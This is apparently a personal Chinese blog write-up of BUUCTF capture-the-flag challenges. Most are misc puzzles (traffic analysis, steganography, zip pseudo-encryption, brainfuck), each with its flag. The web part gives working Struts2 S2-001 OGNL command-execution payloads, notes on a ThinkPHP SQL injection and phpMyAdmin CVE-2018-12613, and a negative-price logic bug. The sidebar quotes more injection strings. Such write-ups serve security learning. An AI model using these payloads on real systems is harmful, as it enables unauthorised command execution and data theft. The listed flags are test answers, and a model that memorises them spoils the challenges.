BUUCTF-做题记录

于 2023-10-17 15:23:43 发布
阅读量441 收藏
点赞数 1
分类专栏: BUUCTF CTF_MISC_Writeup CTF_Web_Writeup 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/129111660
版权

很久没做题了,还是随便来水一水吧,之前都在学别的。

目录

[INSHack2017]remote-multimedia-controller

在这里插入图片描述
流量包,因此选择直接搜看有没有flag
在这里插入图片描述
针对该流进行tcp流的跟踪。
在这里插入图片描述
发现存在一个特殊字符串,用CyberChef直接梭
在这里插入图片描述
flag:

flag{TCP_s0ck3t_4n4lys1s_c4n_b3_fun!}

[INSHack2017]hiding-in-plain-sight

在这里插入图片描述
直接用tokeii👴网站的工具
在这里插入图片描述
然后将foremost后的结果进行下载。
在这里插入图片描述
得到隐藏的flag
在这里插入图片描述
flag:

flag{l337_h4xx0r5_c0mmun1c473_w17h_PNGs}

[QCTF2018]X-man-Keyword

在这里插入图片描述
查看lsb,发现通道内有东西,直接用脚本解得到一串字符。

PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf}

根据lovekfc,然后进行关键字解密
在这里插入图片描述
再根据大小写修改一一对应的位置,得到真正的flag

flag{cCgeLdnrIBCX9G1g13KFfeLNsnMRdOwf}

[BSidesSF2019]diskimage

在这里插入图片描述

老样子zsteg梭一下
在这里插入图片描述
提取出该数据
在这里插入图片描述
然后利用kali自带的testdisk提取其中的图片

testdisk 1.dat

在这里插入图片描述
把这个图片重命名为1.png打开得到flag
在这里插入图片描述
flag:

flag{FAT12_FTW}

[2022红包题]虎年大吉

在这里插入图片描述
工具题,用ciphey直接解
在这里插入图片描述
flag:

flag{29186995}

[WMCTF2020]行为艺术

在这里插入图片描述
打开后有hint.txt,内容

md5sum flag.zip
17f5b08342cf65f6dc08ed0b4c9bd334 flag.zip

另一个文件则是一个图片,里面有504B开头,盲猜应该是一个压缩包的十六进制,但是好像没看见尾部,所以修改图片的高度。
在这里插入图片描述
得到完整的图片
在这里插入图片描述
提取出来得到

504B0304140000000800DB93C55086A39007D8000000DF01000008000000666C61672E74787475504B0E823010DD93708771DDCCB0270D5BBD0371815A9148AC6951C2ED9D271F89C62E2693D7F76BB7DE9FC80D2E6E68E782A326D2E01F81CE6D55E76972E9BA7BCCB3ACEF7B89F7B6E90EA16A6EE2439D45179ECDD1C5CCFB6B9AA489C1218C92B898779D765FCCBB58CC920B6662C5F91749931132258F32BBA7C288C5AE103133106608409DAC419F77241A3412907814AB7A922106B8DED0D25AEC8A634929025C46A33FE5A1D3167A100323B1ABEE4A7A0708413A19E17718165F5D3E73D577798E36D5144B66315AAE315078F5E51A29246AF402504B01021F00140009000800DB93C55086A39007D8000000DF010000080024000000000000002000000000000000666C61672E7478740A00200000000000010018004A0A9A64243BD601F9D8AB39243BD6012D00CA13223BD601504B050600000000010001005A000000FE00000000000000

在这里插入图片描述
得到加密后的zip文件。
利用010查看发现是一个伪加密,修改对应的位由09改为00
在这里插入图片描述
打开后有一个典型的brainfuck编码
在这里插入图片描述
利用网站一把梭
在这里插入图片描述
flag:

flag{wai_bi_baaaa_bo!2333~~~}

[MRCTF2020]寻找xxx

在这里插入图片描述
打开来有个wav,里面是拨号音,直接丢在线解码工具进行解,得到号码。
(由于在BUUCTF进行复现,所以只能做到这一步)
在这里插入图片描述
flag去网上随便找的

flag{Oh!!!!!_Y0u_f1nd_my_secret}

[ThinkPHP]IN SQL INJECTION

在这里插入图片描述
利用payload获取数据库名
在这里插入图片描述
然后在爆破信息里面就有flag了
在这里插入图片描述

[PHPMYADMIN]CVE-2018-12613

在这里插入图片描述
先利用sql执行输入phpinfo
在这里插入图片描述
查看一下session的 值
在这里插入图片描述
由于session已经进行了存储,因此可以直接访问session 的文件得到phpinfo()
在这里插入图片描述
查到flag
在这里插入图片描述

[struts2]s2-001

在这里插入图片描述

利用payload实现命令执行
在这里插入图片描述
在password框内输入要执行的命令
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

根据经验,一般都在env环境变量当中有flag
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

[第三章 web进阶]逻辑漏洞

在这里插入图片描述
打开一个登陆界面,然后随便输入admin/123进行登陆
在这里插入图片描述
进入后有个卖书的位置
在这里插入图片描述
直接买flag买不起
在这里插入图片描述
尝试购买nice,发现可以购买
在这里插入图片描述
利用购买的成功请求包,将cost参数改成复数。
在这里插入图片描述
改成-9999
在这里插入图片描述
重新购买得到flag
在这里插入图片描述

FW_ENJOEY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
[WMCTF2020]行为艺术
wangjin7356的博客
03-21 1090
目录 目链接 解过程 小结 目链接 https://buuoj.cn/challenges#[WMCTF2020]%E8%A1%8C%E4%B8%BA%E8%89%BA%E6%9C%AF 解过程 附件是张png图片和txt文件: hint.txt: 计算flag.zip的MD5值,好像没有什么用。png图片是zip数据,用010Editor修改高度显示全部内容: 手动输入吧: 504B0304140000000800DB93C55086A...
BUUCTF WEB 2020新春红包1
qq_41696858的博客
05-31 312
还是太菜了,继续更吧。发现自己反序列化这块挺菜的,找个目来看看吧,明显的看到了serialize,还有file_put_contents,看来是序列化写shell无疑了 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $
buuctf [ThinkPHP]IN SQL INJECTION
qq_1873822的博客
03-19 958
打开这样的 爆出用户名密码 ?ids[]=1&ids[]=2 错误回显敏感信息,数据库名 ?ids[0,updatexml(0,concat(0xa,user()),0)]=1 漏洞原理 https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html https://www.secpulse.com/archives/59120.html ...
ThinkPHP IN SQL INJECTION解日记20221122
weixin_47493252的博客
11-22 471
ThinkPHP IN SQL INJECTION解日记20221122
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解思路)
BUUCTF逆向前八
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向目,通过这些目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道首先使用exeinfo查看文件信息,确认...
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
buuctf5(sql注入篇)
weixin_63231007的博客
05-10 4002
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTFshow---新春欢乐赛
unexpectedthing的博客
02-11 1192
新春欢乐赛热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
每周刷3.28-4.03
yc11223344的博客
04-03 3656
[UTCTF2020]file header 用010打开看一下 明显缺少文件头,通过目名也可以看出来,下载下来的事png图片,所以把文件头改成png格式 所以flag{3lit3_h4ck3r}
buuctf 新年快乐 wp
m0_73580720的博客
03-26 141
flag{HappyNewYear!}
BUUCTF学习笔记:[Misc] 2022DASCTF MAY
RookieMOR的博客
05-27 1362
1.不懂PCB的厨师不是好黑客: 下载压缩得到文件包,通过目可以知道跟PCB有关。找到PCB文件包打开是一个文件后缀名为epcb的文件。可以去下载一个叫“嘉立创”的软件,就可以打开这个文件,然后得到flag。 还有一个方法是直接用记事本打开这个文件,开始做的时候一直是查找的是flag,发现没有任何信息,看了其他大佬wp知道应该查找DASCTF,就直接找到flag, 2.卡比: 下载得到一张图片: 直接搜索卡尔,可以知道这是一个游戏里面的角色,直接搜索该游戏有关的字符: 翻译得到:p
BUUCTF中的“新年快乐”
在Web和Reverse坑里游泳中。。。。
12-23 1369
今天看了一下日期,距过年还有28天,正好今天做的目也叫新年快乐,就提前给大家拜个早年,祝大家早年幸福。
BUUCTF:[2020 新春红包]
末初的CSDN博客
03-27 2218
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this...
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1265
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值